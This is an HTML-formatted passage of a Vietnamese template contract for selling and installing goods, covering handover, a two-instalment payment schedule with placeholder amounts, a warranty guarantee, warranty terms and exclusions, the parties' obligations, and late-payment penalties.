&#273;&#432;&#7907;c ho&#224;n th&#224;nh khi ch&#7911;ng lo&#7841;i, s&#7889; l&#432;&#7907;ng, ch&#7845;t l&#432;&#7907;ng v&#224; c&#225;c ti&#234;u chu&#7849;n kh&#225;c c&#7911;a h&#224;ng h&#243;a theo &#273;&#250;ng nh&#432; th&#7887;a thu&#7853;n trong H&#7907;p &#272;&#7891;ng n&#224;y v&#224; B&#234;n Mua &#273;&#227; nh&#7853;n &#273;&#432;&#7907;c &#273;&#7847;y &#273;&#7911; c&#225;c h&#7891; s&#417; t&#224;i li&#7879;u giao h&#224;ng quy &#273;&#7883;nh t&#7841;i &#272;i&#7873;u 2 c&#7911;a H&#7907;p &#272;&#7891;ng n&#224;y</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">Trong qu&#225; tr&#236;nh b&#224;n giao n&#7871;u ph&#225;t hi&#7879;n c&#225;c l&#7895;i, h&#7887;ng h&#243;c c&#7911;a h&#224;ng h&#243;a ho&#7863;c ch&#7911;ng lo&#7841;i, s&#7889; l&#432;&#7907;ng, xu&#7845;t x&#7913;, ch&#7845;t l&#432;&#7907;ng v&#224; c&#225;c ti&#234;u chu&#7849;n kh&#225;c c&#7911;a h&#224;ng h&#243;a ch&#432;a theo &#273;&#250;ng nh&#432; th&#7887;a thu&#7853;n trong H&#7907;p &#272;&#7891;ng n&#224;y th&#236; B&#234;n B&#225;n pha&#777;i kh&#7855;c ph&#7909;c c&#225;c l&#7895;i, sai s&#243;t k&#7929; thu&#7853;t &#273;&#243; v&#224; th&#7921;c hi&#7879;n b&#7893; sung ho&#7863;c &#273;&#7893;i l&#7841;i h&#224;ng h&#243;a theo &#273;&#250;ng th&#7887;a thu&#7853;n t&#7841;i H&#7907;p &#272;&#7891;ng n&#224;y.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">Trong tr&#432;&#417;&#768;ng h&#417;&#803;p B&#234;n B&#225;n giao h&#224;ng kh&#244;ng &#273;u&#769;ng theo &#272;i&#234;&#768;u 1 cu&#777;a H&#7907;p &#272;&#7891;ng th&#236; B&#234;n B&#225;n c&#243; tr&#225;ch nhi&#7879;m thay th&#7871; h&#224;ng kh&#225;c cho ph&#249; h&#7907;p v&#7899;i H&#7907;p &#272;&#7891;ng. Tr&#432;&#7901;ng h&#7907;p h&#224;ng thay th&#7871; v&#7851;n kh&#244;ng ph&#249; h&#7907;p th&#236; B&#234;n Mua c&#243; quy&#7873;n tr&#7843; l&#7841;i h&#224;ng.</span>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong><em></em></strong><strong><em>&#272;i&#7873;u ki&#7879;n thi c&#244;ng l&#7855;p &#273;&#7863;t</em></strong><em>.</em></span></li>\n</ul>\n</li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">B&#234;n B c&#7847;n cung c&#7845;p ti&#7871;n &#273;&#7897; l&#7855;p &#273;&#7863;t d&#7921; &#225;n b&#7857;ng v&#259;n b&#7843;n, email v&#224; b&#225;o tr&#432;&#7899;c 5-7 ng&#224;y l&#224;m vi&#7879;c cho B&#234;n A.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">B&#234;n A c&#243; tr&#225;ch nhi&#7879;m b&#224;n giao m&#7863;t b&#7857;ng c&#244;ng tr&#236;nh &#273;&#7875; b&#234;n B thi c&#244;ng &#273;&#250;ng ti&#7871;n &#273;&#7897; th&#7901;i gian. B&#224;n giao b&#7843;ng v&#7869; b&#7889; tr&#237; l&#7855;p &#273;&#7863;t v&#224; c&#225;c v&#7883; tr&#237; l&#7855;p &#273;&#7863;t, d&#226;y di&#7879;n ngu&#7891;n 3 pha (ho&#7863;c 1 pha) ch&#7901; s&#7859;n.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">Khi k&#7929; thu&#7853;t B&#234;n B &#273;&#7871;n c&#244;ng tr&#236;nh nh&#432;ng B&#234;n A v&#7851;n ch&#432;a b&#224;n giao m&#7863;t b&#7857;ng d&#7851;n &#273;&#7871;n ph&#225;t sinh chi ph&#237; th&#236; chi ph&#237; ph&#225;t sinh s&#7869; &#273;&#432;&#7907;c t&#237;nh theo th&#7887;a thu&#7853;n c&#7911;a 2 B&#234;n.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">B&#234;n A c&#243; tr&#225;ch nghi&#7879;m b&#7889; tr&#237; ng&#432;&#7901;i gi&#225;m s&#225;t v&#224; nghi&#7879;m thu b&#224;n giao s&#7889; thi&#7871;t b&#7883; &#273;&#227; l&#7855;p &#273;&#7863;t v&#224; nghi&#7879;m thu th&#7921;c t&#7871; t&#7841;i c&#244;ng tr&#236;nh.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">B&#234;n B c&#243; tr&#225;ch nhi&#7879;m v&#7879; sinh v&#224; &#273;&#7843;m b&#7843;o c&#225;c th&#7911; t&#7909;c v&#7873; an to&#224;n lao &#273;&#7897;ng t&#7841;i c&#244;ng tr&#236;nh, theo s&#7921; h&#432;&#7899;ng d&#7851;n c&#7911;a gi&#225;m s&#225;t b&#234;n A.</span></li>\n</ol>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">&#160;</span></p>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong> </strong><strong>CH&#7844;T L&#431;&#7906;NG H&#192;NG H&#211;A</strong></span></li>\n</ul>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">H&#224;ng h&#243;a m&#224; B&#234;n B&#225;n b&#225;n cho B&#234;n Mua &#273;&#7843;m b&#7843;o &#273;&#250;ng ch&#7911;ng lo&#7841;i, &#273;&#7911; s&#7889; l&#432;&#7907;ng, m&#7899;i nguy&#234;n 100%, &#273;&#7841;t ch&#7845;t l&#432;&#7907;ng theo ti&#234;u chu&#7849;n nh&#224; s&#7843;n xu&#7845;t v&#224; theo y&#234;u c&#7847;u c&#7911;a B&#234;n Mua.</span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><em>&#160;</em></span></p>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong> </strong><strong>GI&#193; TR&#7882; H&#7906;P &#272;&#7890;NG</strong></span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">Gi&#225; tr&#7883; c&#7911;a H&#7907;p &#272;&#7891;ng n&#224;y &#273;&#432;&#7907;c th&#7875; hi&#7879;n chi ti&#7871;t trong Ph&#7909; l&#7909;c 1 (&#8220;Chi ti&#7871;t H&#224;ng h&#243;a&#8221;), B&#234;n Mua s&#7869; thanh to&#225;n gi&#225; tr&#7883; h&#7907;p &#273;&#7891;ng theo c&#225;ch th&#7913;c qui &#273;&#7883;nh trong Ph&#7909; l&#7909;c 1.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">Khi nh&#7853;n &#273;&#432;&#7907;c kho&#7843;n thanh to&#225;n gi&#225; tr&#7883; H&#7907;p &#272;&#7891;ng n&#224;y t&#7915; B&#234;n Mua, B&#234;n B&#225;n s&#7869; ph&#225;t h&#224;nh cho B&#234;n mua ch&#7913;ng t&#7915; b&#7857;ng v&#259;n b&#7843;n x&#225;c nh&#7853;n vi&#7879;c thanh to&#225;n &#273;&#243; b&#7903;i B&#234;n B&#225;n ho&#7863;c &#273;&#7841;i di&#7879;n c&#7911;a B&#234;n B&#225;n.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong> </strong><strong>PH&#431;&#416;NG TH&#7912;C, &#272;I&#7872;U KI&#7878;N V&#192; TI&#7870;N &#272;&#7896; THANH TO&#193;N</strong></span>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong><strong>Ph&#432;&#417;ng th&#7913;c thanh to&#225;n</strong></span></li>\n</ul>\n</li>\n</ul>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">B&#234;n A th&#7921;c hi&#7879;n vi&#7879;c thanh to&#225;n theo quy &#273;&#7883;nh t&#7841;i H&#7907;p &#272;&#7891;ng n&#224;y b&#7857;ng ph&#432;&#417;ng th&#7913;c chuy&#7875;n kho&#7843;n qua t&#224;i kho&#7843;n ng&#226;n h&#224;ng c&#7911;a B&#234;n B v&#7899;i th&#244;ng tin t&#224;i kho&#7843;n &#273;&#432;&#7907;c th&#7875; hi&#7879;n t&#7841;i ph&#7847;n gi&#7899;i thi&#7879;u B&#234;n B c&#7911;a H&#7907;p &#272;&#7891;ng.</span></p>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong><strong>&#272;i&#7873;u ki&#7879;n v&#224; ti&#7871;n &#273;&#7897; thanh to&#225;n</strong></span></li>\n</ul>\n<table width=\"648\">\n<thead>\n<tr>\n<td style=\"width:61.2188px;\">\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>STT</strong></span></p>\n</td>\n<td style=\"width:193.078px;\">\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>Th&#7901;i &#273;i&#7875;m v&#224; &#273;i&#7873;u ki&#7879;n thanh to&#225;n</strong></span></p>\n</td>\n<td style=\"width:280.891px;\">\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>Ph&#7847;n tr&#259;m gi&#225; tr&#7883; H&#7907;p &#272;&#7891;ng</strong></span></p>\n</td>\n<td style=\"width:84.8125px;\">\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>S&#7889; ti&#7873;n thanh to&#225;n (VN&#272;)</strong></span></p>\n</td>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td style=\"width:61.2188px;\">\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong><em>&#272;&#7907;t 1</em></strong></span></p>\n</td>\n<td style=\"width:193.078px;\">\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">B&#234;n A t&#7841;m &#7913;ng 30% (tr&#432;&#7899;c thu&#7871;) t&#432;&#417;ng &#273;&#432;&#417;ng <span style=\"background-color:#ffff00;\">0000000000000000<strong>&#160;vnd</strong></span> (<em>b&#7857;ng ch&#7919;:&#160; <span style=\"background-color:#ffff00;\">Vi&#7879;t Nam &#272;&#7891;ng</span>&#160;&#160;</em>) sau khi x&#225;c nh&#7853;n &#273;&#7863;t h&#224;ng.</span></p>\n</td>\n<td style=\"width:280.891px;\">\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">30%</span></p>\n</td>\n<td style=\"width:84.8125px;\">\n<p></p>\n</td>\n</tr>\n<tr>\n<td style=\"width:61.2188px;\">\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong><em>&#272;&#7907;t 2</em></strong></span></p>\n</td>\n<td style=\"width:193.078px;\">\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">B&#234;n A thanh to&#225;n 70% c&#242;n l&#7841;i (sau thu&#7871;), t&#432;&#417;ng &#273;&#432;&#417;ng <span style=\"background-color:#ffff00;\">0000000000000000<strong>&#160;vnd</strong></span>&#160;(<em>b&#7857;ng ch&#7919;: <span style=\"background-color:#ffff00;\">Vi&#7879;t Nam &#272;&#7891;ng</span></em>) kh&#244;ng qu&#225; 10 ng&#224;y l&#224;m vi&#7879;c sau khi l&#7855;p &#273;&#7863;t ho&#224;n thi&#7879;n v&#224; cung c&#7845;p &#273;&#7847;y &#273;&#7911; ch&#7913;ng t&#7915; h&#7907;p l&#7879;.</span></p>\n</td>\n<td style=\"width:280.891px;\">\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">70%</span></p>\n</td>\n<td style=\"width:84.8125px;\">\n<p></p>\n</td>\n</tr>\n<tr>\n<td style=\"width:61.2188px;\">\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">&#160;</span></p>\n</td>\n<td style=\"width:193.078px;\">\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>T&#7892;NG C&#7896;NG:</strong></span></p>\n</td>\n<td style=\"width:280.891px;\">\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">100%</span></p>\n</td>\n<td style=\"width:84.8125px;\">\n<p></p>\n</td>\n</tr>\n<tr>\n<td colspan=\"4\" style=\"width:638px;\">\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><em>B&#7857;ng ch&#7919;: </em><em>&#160; <span style=\"background-color:#ffff00;\">Vi&#7879;t Nam &#272;&#7891;ng</span></em><em>.</em></span></p>\n</td>\n</tr>\n</tbody>\n</table>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong><u>&#160;</u></strong></span></p>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong><em> </em></strong><strong>&#272;&#7842;M B&#7842;O NGH&#296;A V&#7908; H&#7906;P &#272;&#7890;NG</strong></span>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong> </strong><strong>B&#7843;o l&#227;nh ho&#224;n t&#7841;m &#7913;ng: KH&#212;NG &#193;P D&#7908;NG</strong></span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong> </strong><strong>B&#7843;o l&#227;nh thanh to&#225;n: KH&#212;NG &#193;P D&#7908;NG</strong></span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong> </strong><strong>B&#7843;o l&#227;nh b&#7843;o h&#224;nh:</strong></span></li>\n</ul>\n</li>\n</ul>\n<ol>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">Th&#7901;i h&#7841;n ph&#7843;i n&#7897;p b&#7843;o l&#227;nh: &#272;&#7875; &#273;&#7843;m b&#7843;o ngh&#297;a v&#7909; b&#7843;o h&#224;nh, B&#234;n B&#225;n n&#7897;p cho B&#234;n Mua b&#7843;n g&#7889;c ch&#7913;ng th&#432; b&#7843;o l&#227;nh b&#7843;o h&#224;nh c&#243; gi&#225; tr&#7883; b&#7843;o l&#227;nh b&#7857;ng 5% Gi&#225; Tr&#7883; H&#7907;p &#272;&#7891;ng (tr&#432;&#7899;c Thu&#7871;) trong v&#242;ng 07 (n&#259;m) ng&#224;y sau khi Hai B&#234;n b&#224;n giao, nghi&#7879;m thu H&#224;ng H&#243;a theo quy &#273;&#7883;nh t&#7841;i H&#7907;p &#272;&#7891;ng. Trong su&#7889;t th&#7901;i gian b&#7843;o h&#224;nh, B&#234;n B&#225;n c&#243; ngh&#297;a v&#7909; th&#7921;c hi&#7879;n c&#225;c bi&#7879;n ph&#225;p c&#7847;n thi&#7871;t &#273;&#7875; duy tr&#236; gi&#225; tr&#7883; b&#7843;o l&#227;nh b&#7843;o h&#224;nh lu&#244;n &#7903; m&#7913;c b&#7857;ng v&#7899;i gi&#225; tr&#7883; b&#7843;o l&#227;nh t&#7841;i th&#7901;i &#273;i&#7875;m ph&#225;t h&#224;nh.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">H&#236;nh th&#7913;c b&#7843;o l&#227;nh: B&#7843;o l&#227;nh b&#7843;o h&#224;nh &#273;&#432;&#7907;c ph&#225;t h&#224;nh b&#7903;i m&#7897;t ng&#226;n h&#224;ng ho&#7841;t &#273;&#7897;ng h&#7907;p ph&#225;p t&#7841;i Vi&#7879;t Nam do B&#234;n Mua ch&#7845;p thu&#7853;n, c&#243; n&#7897;i dung &#273;&#432;&#7907;c B&#234;n Mua x&#225;c nh&#7853;n tr&#432;&#7899;c khi ph&#225;t h&#224;nh, c&#243; hi&#7879;u l&#7921;c k&#7875; t&#7915; ng&#224;y ph&#225;t h&#224;nh cho &#273;&#7871;n ng&#224;y th&#7913; 10 (m&#432;&#7901;i) sau ng&#224;y h&#7871;t th&#7901;i h&#7841;n b&#7843;o h&#224;nh. Lo&#7841;i b&#7843;o l&#227;nh b&#7843;o h&#224;nh v&#244; &#273;i&#7873;u ki&#7879;n v&#224; kh&#244;ng h&#7911;y ngang, c&#243; hi&#7879;u l&#7921;c 365 ng&#224;y k&#7875; t&#7915; ng&#224;y ph&#225;t h&#224;nh.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">X&#7917; l&#253; b&#7843;o l&#227;nh: Tr&#432;&#7901;ng h&#7907;p B&#234;n B&#225;n vi ph&#7841;m c&#225;c ngh&#297;a v&#7909; v&#7873; b&#7843;o h&#224;nh, B&#234;n Mua c&#243; quy&#7873;n y&#234;u c&#7847;u ng&#226;n h&#224;ng b&#7843;o l&#227;nh cho B&#234;n B&#225;n gi&#7843;i ng&#226;n to&#224;n b&#7897; gi&#225; tr&#7883; b&#7843;o l&#227;nh b&#7843;o h&#224;nh v&#224;o t&#224;i kho&#7843;n c&#7911;a B&#234;n Mua</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">Tr&#432;&#7901;ng h&#7907;p kh&#244;ng n&#7897;p b&#7843;o l&#227;nh: N&#7871;u B&#234;n B&#225;n kh&#244;ng n&#7897;p ch&#7913;ng th&#432; b&#7843;o l&#227;nh b&#7843;o h&#224;nh cho B&#234;n Mua theo quy &#273;&#7883;nh t&#7841;i &#272;i&#7875;m a v&#224; b Kho&#7843;n n&#224;y, B&#234;n Mua c&#243; quy&#7873;n ng&#7915;ng vi&#7879;c thanh to&#225;n theo quy &#273;&#7883;nh t&#7841;i &#272;i&#7873;u 5 H&#7907;p &#272;&#7891;ng n&#224;y cho &#273;&#7871;n khi B&#234;n B&#225;n n&#7897;p b&#7843;o l&#227;nh b&#7843;o h&#224;nh.</span></li>\n</ol>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong><em>&#160;</em></strong></span></p>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong><em> </em></strong><strong>BA&#777;O HA&#768;NH</strong></span>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong><strong>Th&#7901;i H&#7841;n B&#7843;o H&#224;nh</strong></span></li>\n</ul>\n</li>\n</ul>\n<ol>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">B&#234;n B&#225;n c&#243; tr&#225;ch nhi&#7879;m b&#7843;o h&#224;nh H&#224;ng h&#243;a trong th&#7901;i gian l&#224; 03 n&#259;m (36 th&#225;ng) theo ch&#237;nh s&#225;ch c&#7911;a Nh&#224; S&#7843;n Xu&#7845;t. B&#234;n Mua c&#243; tr&#225;ch nhi&#7879;m tu&#226;n th&#7911; theo m&#7885;i quy t&#7855;c b&#7843;o h&#224;nh thi&#7871;t b&#7883; nh&#432; m&#244;i tr&#432;&#7901;ng s&#7917; d&#7909;ng, nguy&#234;n t&#7855;c s&#7917; d&#7909;ng thi&#7871;t b&#7883;.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">&#272;&#7883;a &#273;i&#7875;m b&#7843;o h&#224;nh: t&#7841;i &#273;&#7883;a ch&#7881; c&#7911;a B&#234;n B&#225;n (<strong><em>&#273;&#7883;a ch&#7881;: 184 Tr&#7847;n L&#7921;u, Ph&#432;&#7901;ng An Ph&#250;, Th&#224;nh Ph&#7889; Th&#7911; &#272;&#7913;c, TPHCM)</em></strong><em>.</em></span>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong> </strong><strong>Ti&#234;u Chu&#7849;n </strong><strong>B&#7843;o</strong><strong> H&#224;nh</strong></span></li>\n</ul>\n</li>\n</ol>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">B&#234;n B&#225;n cam k&#7871;t v&#224; &#273;&#7843;m b&#7843;o v&#7899;i B&#234;n Mua r&#7857;ng H&#224;ng h&#243;a ph&#7843;i &#273;&#432;&#7907;c b&#224;n giao trong t&#236;nh tr&#7841;ng t&#7889;t v&#224; c&#243; ch&#7913;c n&#259;ng, kh&#7843; n&#259;ng v&#224; c&#225;c th&#244;ng s&#7889; k&#297; thu&#7853;t nh&#432; &#273;&#227; th&#7887;a thu&#7853;n v&#224; &#273;&#432;&#7907;c &#273;&#7873; c&#7853;p d&#432;&#7899;i &#273;&#226;y, kh&#244;ng c&#243; khi&#7871;m khuy&#7871;t hay thi&#7871;u h&#7909;t n&#224;o &#273;&#7889;i v&#7899;i H&#224;ng h&#243;a ho&#7863;c b&#7845;t k&#236; ph&#7847;n n&#224;o c&#7911;a H&#224;ng h&#243;a.</span></p>\n<ol>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">N&#7871;u s&#7921; c&#7889; k&#297; thu&#7853;t do B&#234;n Mua g&#226;y ra nh&#432; ph&#225; v&#7905; ni&#234;m phong b&#7843;o h&#224;nh, kh&#244;ng d&#249;ng &#273;&#250;ng quy tr&#236;nh k&#7929; thu&#7853;t, ngu&#7891;n &#273;i&#7879;n kh&#244;ng &#7893;n &#273;&#7883;nh th&#236; vi&#7879;c b&#7843;o h&#224;nh s&#7869; kh&#244;ng &#273;&#432;&#7907;c mi&#7877;n ph&#237;.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">B&#7843;o h&#224;nh ch&#7881; &#225;p d&#7909;ng v&#7899;i nh&#7919;ng l&#7895;i ch&#7871; t&#7841;o c&#7911;a nh&#224; s&#7843;n xu&#7845;t trong &#273;i&#7873;u ki&#7879;n B&#234;n Mua &#225;p d&#7909;ng &#273;&#250;ng c&#225;c quy t&#7855;c b&#7843;o h&#224;nh thi&#7871;t b&#7883; nh&#432; m&#244;i tr&#432;&#7901;ng s&#7917; d&#7909;ng, nguy&#234;n t&#7855;c s&#7917; d&#7909;ng thi&#7871;t b&#7883;.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">Vi&#7879;c b&#7843;o h&#224;nh ngo&#7841;i tr&#7915; c&#225;c tr&#432;&#7901;ng h&#7907;p sau: S&#7843;n ph&#7849;m l&#7855;p &#273;&#7863;t trong ki&#7879;n ti&#7871;p x&#250;c v&#7899;i mu&#7889;i bi&#7875;n, ch&#7845;t &#259;n m&#242;n, &#244;xi ho&#225; cao Thi&#7879;t h&#7841;i h&#7887;ng h&#243;c do l&#7895;i ng&#432;&#7901;i s&#7917; d&#7909;ng, l&#7895;i d&#249;ng sai k&#7929; thu&#7853;t, sai ngu&#7891;n &#273;i&#7879;n v&#224; thi&#7879;t h&#7841;i, l&#7895;i, th&#7845;t b&#7841;i hay s&#7921; c&#7889; do nguy&#234;n nh&#226;n b&#234;n ngo&#224;i, bao g&#7891;m c&#7843; tai n&#7841;n, l&#7841;m d&#7909;ng, s&#7917; d&#7909;ng sai, ph&#7909;c v&#7909; kh&#244;ng &#273;&#432;&#7907;c ph&#233;p c&#7911;a B&#234;n B&#225;n, hao m&#242;n th&#244;ng th&#432;&#7901;ng, h&#224;nh &#273;&#7897;ng c&#7911;a thi&#234;n tai, h&#7887;a ho&#7841;n, l&#361; l&#7909;t, chi&#7871;n tranh, h&#224;nh &#273;&#7897;ng b&#7841;o l&#7921;c ho&#7863;c b&#7845;t k&#7923; x&#7843;y ra t&#432;&#417;ng t&#7921;.</span></li>\n</ol>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong> </strong><strong>QUY&#7872;N V&#192; NGH&#296;A V&#7908; C&#7910;A C&#193;C B&#202;N</strong></span>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong><strong>Quy&#7873;n v&#224; ngh&#297;a v&#7909; c&#7911;a B&#234;n A: </strong></span></li>\n</ul>\n</li>\n</ul>\n<ol>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">Thanh to&#225;n &#273;&#250;ng h&#7841;n v&#224; &#273;&#7847;y &#273;&#7911; cho B&#234;n B;</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">T&#7841;o &#273;i&#7873;u ki&#7879;n thu&#7853;n l&#7907;i &#273;&#7875; B&#234;n B ho&#224;n th&#224;nh t&#7889;t c&#244;ng vi&#7879;c c&#7911;a m&#236;nh.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">C&#7917; nh&#226;n vi&#234;n c&#243; &#273;&#7911; kinh nghi&#7879;m v&#224; n&#259;ng l&#7921;c c&#361;ng nh&#432; c&#243; &#273;&#7911; th&#7849;m quy&#7873;n &#273;&#7875; ph&#7889;i h&#7907;p v&#7899;i ng&#432;&#7901;i &#273;&#7841;i di&#7879;n c&#7911;a B&#234;n B trong vi&#7879;c gi&#7843;i quy&#7871;t c&#225;c v&#7845;n &#273;&#7873; k&#7929; thu&#7853;t, ch&#7845;t l&#432;&#7907;ng t&#7841;i &#273;&#7883;a &#273;i&#7875;m giao h&#224;ng nh&#432; &#273;&#227; &#273;&#7873; c&#7853;p trong &#272;i&#7873;u 2 c&#7911;a H&#7907;p &#272;&#7891;ng n&#224;y.</span>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong><strong>Quy&#7873;n v&#224; ngh&#297;a v&#7909; c&#7911;a B&#234;n B:</strong></span></li>\n</ul>\n</li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">B&#234;n B c&#243; ngh&#297;a v&#7909; cung c&#7845;p cho B&#234;n A H&#224;ng h&#243;a v&#224; d&#7883;ch v&#7909; nh&#432; &#273;&#227; &#273;&#7873; c&#7853;p trong Ph&#7909; l&#7909;c 1.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">B&#234;n B&#225;n xu&#7845;t tr&#236;nh v&#224; &#273;&#7843;m b&#7843;o r&#7857;ng:</span></li>\n</ol>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">&#272;&#432;&#7907;c c&#7845;p ph&#233;p theo qui &#273;&#7883;nh v&#224; lu&#7853;t hi&#7879;n h&#224;nh &#273;&#7875; th&#7921;c hi&#7879;n ngh&#297;a v&#7909; theo h&#7907;p &#273;&#7891;ng v&#224; c&#243; chuy&#234;n m&#244;n ph&#249; h&#7907;p &#273;&#7875; th&#7921;c hi&#7879;n c&#225;c c&#244;ng vi&#7879;c &#273;&#7863;c th&#249; &#273;&#227; th&#7889;ng nh&#7845;t b&#7903;i B&#234;n Mua v&#224; B&#234;n B&#225;n &#273;&#7891;ng th&#7901;i c&#243; th&#7849;m quy&#7873;n &#273;&#7875; th&#7921;c hi&#7879;n ngh&#297;a v&#7909; c&#7911;a m&#236;nh.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">V&#7899;i chi ph&#237; c&#7911;a m&#236;nh, c&#243; v&#224; s&#7869; c&#243; &#273;&#432;&#7907;c tr&#432;&#7899;c khi th&#7921;c hi&#7879;n b&#7845;t k&#7923; d&#7883;ch v&#7909; c&#7847;n thi&#7871;t cho vi&#7879;c &#273;&#259;ng k&#237;, c&#7845;p ph&#233;p, gi&#7845;y ph&#233;p v&#224; &#7911;y quy&#7873;n &#273;&#7875; ti&#7871;n h&#224;nh kinh doanh v&#224; th&#7921;c hi&#7879;n c&#225;c d&#7883;ch v&#7909;; v&#224;</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">Ph&#7843;i th&#7921;c hi&#7879;n c&#225;c c&#244;ng vi&#7879;c v&#224; t&#7845;t c&#7843; d&#7883;ch v&#7909; cho B&#234;n Mua m&#7897;t c&#225;ch an to&#224;n, chuy&#234;n nghi&#7879;p v&#224; th&#7887;a m&#227;n y&#234;u c&#7847;u, tu&#226;n th&#7911; t&#7845;t c&#7843; c&#225;c Lu&#7853;t, ngh&#7883; &#273;&#7883;nh, s&#7855;c l&#7879;nh, quy t&#7855;c v&#224; quy &#273;&#7883;nh ph&#249; h&#7907;p v&#7899;i ph&#225;p lu&#7853;t v&#224; h&#432;&#7899;ng d&#7851;n c&#7911;a B&#234;n Mua.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong> </strong><strong>VI PH&#7840;M H&#7906;P &#272;&#7890;NG</strong></span>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong>Tr&#432;&#7901;ng h&#7907;p B&#234;n A thanh to&#225;n cho B&#234;n B gi&#225; tr&#7883; C&#244;ng Vi&#7879;c ho&#7863;c C&#244;ng Vi&#7879;c Ph&#225;t Sinh kh&#244;ng &#273;&#250;ng th&#7901;i h&#7841;n nh&#432; quy &#273;&#7883;nh t&#7841;i &#272;i&#7873;u 5 c&#7911;a H&#7907;p &#272;&#7891;ng, thi&#768; B&#234;n Mua ph&#7843;i tr&#7843; cho b&#234;n b&#225;n 1 kho&#7843;n ph&#7841;t ch&#7853;m thanh to&#225;n t&#237;nh theo l&#227;i su&#7845;t n&#7907; qu&#225; h&#7841;n c&#7911;a Ng&#226;n h&#224;ng &#225;p d&#7909;ng v&#224;o ng&#224;y h&#7871;t h&#7841;n thanh to&#225;n cho kho&#7843;n ti&#7873;n ch&#7853;m thanh to&#225;n v&#224; cho th&#7901;i gian ch&#7853;m thanh to&#225;n, nh&#432;ng t&#7893;ng gi&#225; tr&#7883; kho&#7843;n ti&#7873;n ph&#7841;t kh&#244;ng v&#432;&#7907;t qu&#225; 8% gi&#225; tr&#7883; H&#7907;p &#272;&#7891;ng b&#7883; vi ph&#7841;m v&#224; ph&#7843;i b&#7891;i th&#432;&#7901;ng m&#7885;i thi&#7879;t h&#7841;i cho B&#234;n B&#225;n, nh&#432;ng trong m&#7885;i tr&#432;&#7901;ng h&#7907;p, m&#7913;c b&#7891;i th&#432;&#7901;ng kh&#244;ng nhi&#7873;u h&#417;n 12% gi&#225; tr&#7883; h&#7907;p &#273;&#7891;ng.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong>Trong tr&#432;&#7901;ng h&#7907;p B&#234;n B vi ph&#7841;m ngh&#297;a v&#7909; c&#417; b&#7843;n c&#7911;a H&#7907;p &#272;&#7891;ng, ch&#7853;m tr&#7877; ti&#7871;n &#273;&#7897; thi c&#244;ng v&#224;/ho&#7863;c b&#224;n giao tr&#7877; h&#7841;n (ngo&#7841;i tr&#7915; tr&#432;&#7901;ng h&#7907;p 